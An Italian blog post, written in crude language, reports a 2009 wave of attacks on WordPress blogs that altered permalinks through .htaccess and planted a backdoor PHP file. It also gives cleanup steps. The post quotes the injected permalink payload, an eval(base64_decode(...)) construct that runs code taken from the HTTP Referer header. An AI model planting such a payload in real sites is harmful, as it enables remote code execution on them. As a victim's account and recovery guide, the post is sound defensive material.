Offensiva hacking: da ieri centinaia di blog infettati da un hack. La chiamata a quel “base64_decode” è un tentativo di redirect.

hacker ai blogCazzo! Disse il conte. Da ieri centinaia di blog stanno combattendo contro un’offensiva di hackers (pezzi di merda) che si divertono a sputtanare la struttura dei permalink.

Soggetti all’attacco tutti i blog su piattaforma wordpress, comprese le ultime release fino alla 2.8.4.

Il primo sintomo è una stringa che si viene ad aggiungere a tutti i permalink: “%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/”

Il risultato può essere un bel “Bed request error“, con la conseguenza che risulta impossibile accedere all’intero post in single page.

Il problema viene generato da una falla che consente all’attaccante di modificare il file .htaccess e generare così il cambiamento della struttura.

Ma attenzione, perchè la cosa non si ferma qui. Tutta la questione viene messa in atto per poter depositare un uovo di pasqua nella root del blog, un .php contenente codice malevolo verso cui il redirect di cui sopra tenterà di indirizzare le chiamate in single page.

Fin tanto che si genera l’errore di “Bad request” si tratta solo di una noia e nulla più; il pericolo scatta quando il codice genera un redirect efficace. In questo caso l’utente non si accorge di nulla ma va di fatto ad eseguire il codice malevolo.

Cosa cazzo ci guadagnano questi grandissimi figli di puttana da un’operazione del genere non lo so. So solo che ieri sono stato fortunato e sono riuscito a risolvere il problema praticamente subito.

Per togliere il redirect basta andare nel pannello di amministrazione di WordPress e rimettere la spunta sulla struttura di permalink abituale. Il problema però è che questo non impedisce al bot che ha generato l’hacking di ripeterlo.

Occorre accedere alla root via FTP e controllare la presenza di file estranei. Io ho trovato un file “li.php” datato 1 Aprile 2000 (pure spiritosi). Quando ho tentato di aprirlo sono stato fermato al volo dall’antivirus che me l’ha segnalato come “trojan/backdoor”. L’ho eliminato e, per il momento almeno, la struttura permalink sembra ritornata stabile.

Mi scuso quindi in anticipo per gli eventuali disservizi di queste ore ma sto tenendo sotto controllo il blog per capire quale sia la falla sfruttata.

Condividi
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Commenta con il tuo nome Facebook

Lascia un commento

Inserendo un commento acconsenti al trattamento dei tuoi dati. Per maggiori informazioni consulta la nostra Informativa. I campi seguiti da "*" sono obbligatori. La tua email comunque NON viene pubblicata.